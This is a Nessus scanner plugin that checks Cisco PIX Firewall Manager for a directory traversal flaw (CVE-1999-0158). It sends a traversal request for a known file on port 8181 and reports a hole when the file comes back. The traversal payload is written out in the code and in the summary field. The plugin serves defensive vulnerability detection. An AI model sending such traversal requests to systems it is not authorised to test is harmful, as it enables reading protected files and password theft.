# # This script was written by H D Moore # # Script audit and contributions from Carmichael Security # Erik Anderson # Added BugtraqID and CVE # # See the Nessus Scripts License for details # if(description) { script_id(10819); script_version("$Revision$"); script_bugtraq_id(691); script_cve_id("CVE-1999-0158"); name["english"] = "PIX Firewall Manager Directory Traversal"; script_name(english:name["english"], francais:name["francais"]); desc["english"] = " It is possible to read arbitrary files on this machine by using relative paths in the URL. This flaw can be used to bypass the management software's password protection and possibly retrieve the enable password for the Cisco PIX. This vulnerability has been assigned Cisco Bug ID: CSCdk39378. Solution: Cisco originally recommended upgrading to version 4.1.6b or version 4.2, however the same vulnerability has been found in version 4.3. Cisco now recommends that you disable the software completely and migrate to the new PIX Device Manager software. Risk factor : High"; script_description(english:desc["english"]); summary["english"] = "\..\..\file.txt"; summary["francais"] = "\..\..\file.txt"; script_summary(english:summary["english"], francais:summary["francais"]); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 2001 Digital Defense Inc.", francais:"Ce script est Copyright (C) 2001 Digital Defense Inc."); family["english"] = "CGI abuses"; family["francais"] = "Abus de CGI"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes"); script_require_ports("Services/www", 8181); exit(0); } # # The script code starts here # include("http_func.inc"); include("misc_func.inc"); ports = add_port_in_list(list:get_kb_list("Services/www"), port:8181); foreach port (ports) { req = http_get(item:string("/..\\pixfir~1\\how_to_login.html"), port:port); soc = http_open_socket(port); if(soc) { send(socket:soc, data:req); r = http_recv(socket:soc); http_close_socket(soc); if("How to login" >< r){ security_hole(port); } } }